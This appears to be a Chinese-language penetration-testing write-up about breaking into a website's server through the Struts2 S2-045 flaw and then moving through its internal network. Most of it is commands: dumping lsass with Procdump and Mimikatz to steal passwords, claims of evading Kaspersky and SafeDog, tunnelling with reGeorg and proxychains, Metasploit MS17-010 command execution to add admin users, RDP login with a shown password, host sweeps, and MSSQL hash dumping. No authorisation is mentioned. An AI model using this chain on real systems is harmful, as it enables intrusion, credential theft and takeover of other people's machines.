前言
某次测试一网站发现struts2-045漏洞。通过翻看文件夹上传文件到不同端口进行访问。
进而getshell菜刀连接。
同样查看权限,添加用户远程连接。
在添加到管理员组的时候遇到阻碍。
server 2003的服务器。
查看进程tasklist。。好像是安全狗。
在经过反复查找资料后,使用Procdump+Mimikatz直接获取管理员的密码。
参考资料:利用Procdump+Mimikatz获取Windows帐户密码
直接上传procdump工具。运行的条件为system。(版本为server 2003,不会被杀)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
将导出的lsass.dmp文件下载到本地。
这里使用mimikatz工具进行读取密码的时候,出现了错误。
解决方法:读取lsass.dmp报错
换一台机器,使用windows server 2003重新进行读取,果然可以。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
获取到的密码进行远程登录。依然不对。
查看一下端口是否被修改。
tasklist /svc 查看TermService服务
netstat -ano | find "2212" 查看3389的端口
ok!!!
完美绕过卡巴斯基、安全狗。
注:一台服务器多个IP
内网渗透
使用reGeorg+Proxifier进行内网渗透。。
使用kali运行reGeorg文件。
然后配置proxychains。。
vim /etc/proxychains.conf
就可以将kali的一些工具代理进内网,比如metasploit、nmap。
ms17-010
使用任何工具前面添加proxychains即可。
先对该11.0.0.1/24网段扫描一下ms17-010。。
use auxiliary/scanner/smb/smb_ms17_010
扫描发现多台服务器存在ms17-010漏洞,但无法反弹shell。。
命令执行
那尝试使用ms17-010的执行系统命令的模块。
use auxiliary/admin/smb/ms17_010_command
命令执行批量给几台服务器添加了admin管理员。
巧合的是该服务器还是域服务器,安装了卡巴斯基杀毒。。导致上传的exe马或mimikatz工具都被杀。
难怪无法反弹shell。。
后发现该网段大部分服务器都打了补丁、装了杀毒。
注:使用procdump+mimikatz同样可以获取windows帐户密码
还有一台11.0.0.50服务器。
可以通过rdesktop工具访问。。
proxychains rdesktop -u admin -p 1234qwer.. 11.0.0.50 -g 1024*800
该服务器未安装卡巴斯基,可以上传mimikatz工具获取管理员密码。
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
存活主机
使用for循环判断该网段存活主机。
for /l %i in (1,1,255) do @ ping 11.0.0.%i -w 1 -n 1 | find /i "ttl="
弱口令
可以上传hsscan工具。。扫描该网段常见服务的一些弱口令。
配合弱口令,通过msf的mssql一些模块执行命令。
use auxiliary/scanner/mssql/mssql_hashdump
use auxiliary/admin/mssql/mssql_exec
尝试执行系统命令,添加用户。
获得11.0.0.18的服务器。
